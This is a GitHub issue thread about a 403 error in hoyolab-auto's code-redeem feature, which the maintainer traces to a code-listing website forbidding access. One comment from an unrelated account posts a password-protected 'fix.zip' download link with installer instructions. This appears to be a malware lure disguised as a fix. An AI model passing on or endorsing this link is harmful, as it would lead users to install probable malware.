### ISSUE TITLE
Code Redeem Issue

### ISSUE THREAD

**Issue by Antivash** [torikushiii/hoyolab-auto#60]
I'm not entirely sure what is going on, but I appear to have an issue with the code redeem option. I am seeing a 403 error with it. Attempted to look through the past issues or documentation, I can't seem to find an explanation to what is going on with it beyond the error in terminal.

Issue persists on both Windows and Linux. Originally I wondered if it was the UserAgent option at the top, but after replacing it with the below, the issue continues.

[Config with sensitive info removed.](https://pastebin.com/kNgKerC2)
[Screenshot One](https://i.imgur.com/s7oii5E.png) (Run on windows)
[Screenshot Two](https://i.imgur.com/KAYkX70.png) (Run on Linux)

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by torikushiii** [comment]
can you access this website? https://www.pcgamesn.com/zenless-zone-zero/codes

it says that you're forbidden from accessing the page

**Comment by Antivash** [comment]
I can on all browsers I've tried it with, but they all require me to do a [human verification thing](https://i.imgur.com/60MTOoS.png)

**Comment by Antivash** [comment]
Ahh, I see. I thought I might have configured it wrong. I'll go ahead and make the edit to drop the error. Thank you for helping.
